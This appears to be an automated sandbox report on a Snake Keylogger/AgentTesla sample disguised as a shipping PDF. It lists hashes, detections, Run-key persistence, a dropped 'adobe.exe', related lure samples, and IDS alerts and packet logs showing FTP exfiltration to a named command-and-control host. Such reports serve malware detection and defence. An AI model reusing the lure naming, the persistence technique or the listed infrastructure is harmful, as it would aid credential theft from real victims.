IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Hidden Files and Directories	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Arrival Notice - BL 713410220035.PDF.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.SnakeKeylogger
Arrival Notice - BL 713410220035.PDF.exe	56%	Virustotal		Browse
Arrival Notice - BL 713410220035.PDF.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Adobe\adobe.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Adobe\adobe.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.SnakeKeylogger
C:\Users\user\AppData\Roaming\Adobe\adobe.exe	56%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
api.ipify.org	0%	Virustotal	Browse
s4.serv00.com	0%	Virustotal	Browse
171.39.242.20.in-addr.arpa	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://api.ipify.org/	0%	URL Reputation	safe
https://api.ipify.org	0%	URL Reputation	safe
https://account.dyn.com/	0%	URL Reputation	safe
https://api.ipify.org/t	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://s4.serv00.com	0%	Avira URL Cloud	safe
http://s4.serv00.com	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	172.67.74.152	true	false	0%, Virustotal, Browse	unknown
s4.serv00.com	213.189.52.181	true	true	0%, Virustotal, Browse	unknown
171.39.242.20.in-addr.arpa	unknown	unknown	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ipify.org	Arrival Notice - BL 713410220035.PDF.exe, 00000000.00000002.2147638567.00000000037E9000.00000004.00000800.00020000.00000000.sdmp, Arrival Notice - BL 713410220035.PDF.exe, 00000002.00000002.4609963887.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.2361618882.0000000000402000.00000040.00000400.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.2364755330.0000000003511000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4611154293.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://account.dyn.com/	Arrival Notice - BL 713410220035.PDF.exe, 00000000.00000002.2147638567.00000000037E9000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.2361618882.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.org/t	Arrival Notice - BL 713410220035.PDF.exe, 00000002.00000002.4609963887.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.2364755330.0000000003511000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4611154293.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Arrival Notice - BL 713410220035.PDF.exe, 00000002.00000002.4609963887.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.2364755330.0000000003511000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4611154293.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://s4.serv00.com	Arrival Notice - BL 713410220035.PDF.exe, 00000002.00000002.4609963887.0000000002AAC000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.2364755330.000000000358C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4611154293.0000000002EBC000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
213.189.52.181	s4.serv00.com	Poland		57367	ECO-ATMAN-PLECO-ATMAN-PL	true
172.67.74.152	api.ipify.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1491468
Start date and time:	2024-08-12 11:33:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Arrival Notice - BL 713410220035.PDF.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@9/2@3/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 254 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:33:58	API Interceptor	8288385x Sleep call for process: Arrival Notice - BL 713410220035.PDF.exe modified
05:34:12	API Interceptor	6643720x Sleep call for process: adobe.exe modified
11:34:03	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run adobe C:\Users\user\AppData\Roaming\adobe\adobe.exe
11:34:11	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run adobe C:\Users\user\AppData\Roaming\adobe\adobe.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
213.189.52.181	BL NBNSA240600050.xlsx.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	DC74433Y7889021.xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PRE ALERT Docs_PONBOM01577.xlsx.exe	Get hash	malicious	AgentTesla	Browse
	Ship Docs YINGHAI-MANE PO 240786.xlsx.exe	Get hash	malicious	AgentTesla	Browse
172.67.74.152	FormPlayer.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	PandaClient.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	golang-modules.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	242764.exe	Get hash	malicious	Ficker Stealer, Rusty Stealer	Browse	api.ipify.org/?format=wef
	K8mzlntJVN.msi	Get hash	malicious	Unknown	Browse	api.ipify.org/
	stub.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	stub.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Sonic-Glyder.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s4.serv00.com	BL NBNSA240600050.xlsx.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	213.189.52.181
	DC74433Y7889021.xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	213.189.52.181
	PRE ALERT Docs_PONBOM01577.xlsx.exe	Get hash	malicious	AgentTesla	Browse	213.189.52.181
	Ship Docs YINGHAI-MANE PO 240786.xlsx.exe	Get hash	malicious	AgentTesla	Browse	213.189.52.181
api.ipify.org	devil.vbe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	http://pub-905beb8d29144993af2d899668b8014d.r2.dev/auth_gen.html	Get hash	malicious	Unknown	Browse	172.67.74.152
	SecuriteInfo.com.Win64.Evo-gen.27204.8168.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	SecuriteInfo.com.Win32.PWSX-gen.8266.31032.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	SecuriteInfo.com.Win32.PWSX-gen.25135.17011.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	SOA.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	DHL Shipment Doc.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	invoice727282_PDF..exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	SecuriteInfo.com.Win32.PWSX-gen.5215.298.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	SecuriteInfo.com.Win32.PWSX-gen.2282.26838.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ECO-ATMAN-PLECO-ATMAN-PL	BL NBNSA240600050.xlsx.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	213.189.52.181
	DC74433Y7889021.xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	213.189.52.181
	https://skposta.serv00.net/	Get hash	malicious	Unknown	Browse	128.204.223.100
	PRE ALERT Docs_PONBOM01577.xlsx.exe	Get hash	malicious	AgentTesla	Browse	213.189.52.181
	BOQ_Algeemi_SharePoint_Tender_3768889756.xksx.exe	Get hash	malicious	AgentTesla	Browse	91.185.189.19
	http://10f4cf3.wcomhost.com/	Get hash	malicious	Unknown	Browse	85.194.241.205
	Ship Docs YINGHAI-MANE PO 240786.xlsx.exe	Get hash	malicious	AgentTesla	Browse	213.189.52.181
	BOQ_Algeemi_SharePoint_Tender.xlsx.exe	Get hash	malicious	AgentTesla	Browse	91.185.189.19
	OriginalMessage.txt.msg	Get hash	malicious	HTMLPhisher	Browse	31.186.83.254
	Invoice_23257538_PDF.wsf	Get hash	malicious	GuLoader	Browse	31.186.83.248
CLOUDFLARENETUS	https://magic.ly/0nedri0ff	Get hash	malicious	HTMLPhisher	Browse	172.67.214.173
	https://angularjsdevelopment.com/Reviewdocuments.html	Get hash	malicious	HTMLPhisher	Browse	172.67.185.56
	https://t.ly/tCnoF	Get hash	malicious	Unknown	Browse	104.20.7.133
	Quote RF-E68-STD-094.pdf.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	https://u8cypa.ontralink.com/c/s/6Ubz/sViK/z/pz/vsP/6AZrDf/6cdw2KBiol/P/P/60	Get hash	malicious	HTMLPhisher	Browse	172.66.40.141
	https://minisrclink.cool/	Get hash	malicious	Unknown	Browse	104.18.86.42
	https://hr.economictimes.indiatimes.com/etl.php?url=despertartecamp.com.br/cgi/index.html#Z2lmdGxpc3RAam9obmxld2lzLmNvLnVr	Get hash	malicious	Unknown	Browse	104.18.86.42
	https://hr.economictimes.indiatimes.com/etl.php?url=despertartecamp.com.br/cgi/index.html#Z2lmdGxpc3RAam9obmxld2lzLmNvLnVr	Get hash	malicious	Unknown	Browse	104.18.86.42
	SecuriteInfo.com.Trojan.AutoIt.1430.4587.24786.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	http://www.lapumpandvalve.com	Get hash	malicious	Unknown	Browse	172.64.151.101

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	15514541_Doc_Sub(C-A0893)10-08-2024.js	Get hash	malicious	Unknown	Browse	172.67.74.152
	DSSd4xRvdt.exe	Get hash	malicious	Quasar	Browse	172.67.74.152
	Quote RF-E68-STD-094.pdf.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
	SecuriteInfo.com.Trojan.AutoIt.1430.4587.24786.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
	http://pub-09a55f0b5ac14dbbbc79ab40abc0b630.r2.dev/index.html	Get hash	malicious	Unknown	Browse	172.67.74.152
	https://datechde.com/	Get hash	malicious	Unknown	Browse	172.67.74.152
	https://awaisni.github.io/awais-1	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	http://pub-cbaabd801f124c2480bfbff1f6a830e7.r2.dev/index.html	Get hash	malicious	Unknown	Browse	172.67.74.152
	https://kyc-metamaskwallet.webhop.net/927618a1-19574-4cac-b653-8c6be681sd84x6c5/d7a54	Get hash	malicious	Phisher	Browse	172.67.74.152
	http://instagramexternalwebsite.rf.gd/	Get hash	malicious	Unknown	Browse	172.67.74.152

Process:	C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	960000
Entropy (8bit):	7.27249948552536
Encrypted:	false
SSDEEP:	24576:HL3chDp8wz55EybtTNxhmvnM3X+Br29HjJn:HoKwDE8xhmvn729DJ
MD5:	B9EE0C2BA1D0961EB00AA101730EC076
SHA1:	66E5BDE292AD6D8A6C7227C376D5C7E3E7A68E2A
SHA-256:	0F497B23B90B11F7B6B2F7B8E3AFF0618FB3325EED93AC43E4046B82AF8D1257
SHA-512:	977B689C7D413E9241878F0E32AD6CAA337793A4EB5C9F1F888C4CB1B0CDC1F53465B45B38638BBE7584D3D6594D255BA2BE9E9F16D8AAB2D8ABD3EBD2BA9FDF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63% Antivirus: Virustotal, Detection: 56%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0..0...t.......N... ...`....@.. ....................................@..................................N..K....`..bq........................................................................... ............... ..H............text........ ...0.................. ..`.rsrc...bq...`...r...2..............@..@.reloc..............................@..B.................N......H........E..............H...@...........................................<WinRT>............................................................................ ...#...&...'...(......,...+...0...2...3...4...5......................#.............T..AllowMultiple................................T..AllowMultiple.........?_....:................................................................... ...#...&...'...(......,...+...................................................... #&'(*,+..

C:\Users\user\AppData\Roaming\Adobe\adobe.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.27249948552536
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Arrival Notice - BL 713410220035.PDF.exe
File size:	960'000 bytes
MD5:	b9ee0c2ba1d0961eb00aa101730ec076
SHA1:	66e5bde292ad6d8a6c7227c376d5c7e3e7a68e2a
SHA256:	0f497b23b90b11f7b6b2f7b8e3aff0618fb3325eed93ac43e4046b82af8d1257
SHA512:	977b689c7d413e9241878f0e32ad6caa337793a4eb5c9f1f888c4cb1b0cdc1f53465b45b38638bbe7584d3d6594d255ba2be9e9f16d8aab2d8abd3ebd2ba9fdf
SSDEEP:	24576:HL3chDp8wz55EybtTNxhmvnM3X+Br29HjJn:HoKwDE8xhmvn729DJ
TLSH:	8715BE12B6A86F2BC34F4377F4B1040547B7EC093E16D7CA5494BEA8BC57B9A88026D7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..0...t.......N... ...`....@.. ....................................@................................

File Icon


Icon Hash:	0c521272c9c4e21c

Static PE Info

General

Entrypoint:	0x4e4eee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xCECC87C8 [Mon Dec 11 08:56:40 2079 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xe4ea0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe6000	0x7162	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xee000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xe2ef4	0xe3000	1b6c837396a3a63f31f57b069c1cbeba	False	0.6228124139592511	data	7.279409615200225	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xe6000	0x7162	0x7200	96b4b51a69ead2f423d866ec0fa431c4	False	0.46717379385964913	data	5.644668711216057	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xee000	0xc	0x200	3d8ddb740b2349e1f84f1ebee96c8a77	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xe61f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m	0.35815602836879434
RT_ICON	0xe6658	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 2835 x 2835 px/m	0.2815573770491803
RT_ICON	0xe6fe0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m	0.2298311444652908
RT_ICON	0xe8088	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m	0.16763485477178422
RT_ICON	0xea630	0x25a5	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9611912420877866
RT_GROUP_ICON	0xecbd8	0x4c	data	0.75
RT_VERSION	0xecc24	0x354	data	0.4072769953051643
RT_MANIFEST	0xecf78	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-12T11:34:03.487379+0200	TCP	2029927	ET MALWARE AgentTesla Exfil via FTP	1	49714	21	192.168.2.6	213.189.52.181
2024-08-12T11:34:04.044240+0200	TCP	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	49716	63831	192.168.2.6	213.189.52.181
2024-08-12T11:34:25.300722+0200	TCP	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	49729	63877	192.168.2.6	213.189.52.181
2024-08-12T11:34:25.306377+0200	TCP	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	49729	63877	192.168.2.6	213.189.52.181
2024-08-12T11:34:04.038781+0200	TCP	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	49716	63831	192.168.2.6	213.189.52.181
2024-08-12T11:34:24.517170+0200	TCP	2029927	ET MALWARE AgentTesla Exfil via FTP	1	49728	21	192.168.2.6	213.189.52.181

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 12, 2024 11:33:59.876586914 CEST	49710	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:33:59.876679897 CEST	443	49710	172.67.74.152	192.168.2.6
Aug 12, 2024 11:33:59.876765966 CEST	49710	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:33:59.882651091 CEST	49710	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:33:59.882690907 CEST	443	49710	172.67.74.152	192.168.2.6
Aug 12, 2024 11:34:00.478312016 CEST	443	49710	172.67.74.152	192.168.2.6
Aug 12, 2024 11:34:00.478408098 CEST	49710	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:34:00.481983900 CEST	49710	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:34:00.482038021 CEST	443	49710	172.67.74.152	192.168.2.6
Aug 12, 2024 11:34:00.482342005 CEST	443	49710	172.67.74.152	192.168.2.6
Aug 12, 2024 11:34:00.534097910 CEST	49710	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:34:00.535316944 CEST	49710	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:34:00.576505899 CEST	443	49710	172.67.74.152	192.168.2.6
Aug 12, 2024 11:34:00.641505003 CEST	443	49710	172.67.74.152	192.168.2.6
Aug 12, 2024 11:34:00.641657114 CEST	443	49710	172.67.74.152	192.168.2.6
Aug 12, 2024 11:34:00.641719103 CEST	49710	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:34:00.647036076 CEST	49710	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:34:01.352365017 CEST	49714	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:01.357232094 CEST	21	49714	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:01.357336044 CEST	49714	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:01.943536043 CEST	21	49714	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:01.943725109 CEST	49714	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:01.951491117 CEST	21	49714	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:02.136149883 CEST	21	49714	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:02.136384010 CEST	49714	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:02.144113064 CEST	21	49714	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:02.399908066 CEST	21	49714	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:02.415245056 CEST	49714	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:02.420406103 CEST	21	49714	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:02.605839014 CEST	21	49714	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:02.606173992 CEST	49714	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:02.611104012 CEST	21	49714	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:02.796732903 CEST	21	49714	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:02.828052998 CEST	49714	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:02.833062887 CEST	21	49714	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:03.019509077 CEST	21	49714	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:03.028523922 CEST	49714	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:03.033591032 CEST	21	49714	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:03.477665901 CEST	21	49714	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:03.478638887 CEST	49716	63831	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:03.479120970 CEST	21	49714	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:03.479260921 CEST	49714	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:03.484277010 CEST	63831	49716	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:03.484512091 CEST	49716	63831	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:03.487379074 CEST	49714	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:03.492271900 CEST	21	49714	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:04.038480043 CEST	21	49714	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:04.038780928 CEST	49716	63831	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:04.038780928 CEST	49716	63831	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:04.043585062 CEST	63831	49716	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:04.044174910 CEST	63831	49716	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:04.044239998 CEST	49716	63831	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:04.080965042 CEST	49714	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:04.229804039 CEST	21	49714	213.189.52.181	192.168.2.6
Aug 12, 2024 11:34:04.284091949 CEST	49714	21	192.168.2.6	213.189.52.181
Aug 12, 2024 11:34:13.586740017 CEST	49720	443	192.168.2.6	172.67.74.152
Aug 12, 2024 11:34:13.586843967 CEST	443	49720	172.67.74.152	192.168.2.6
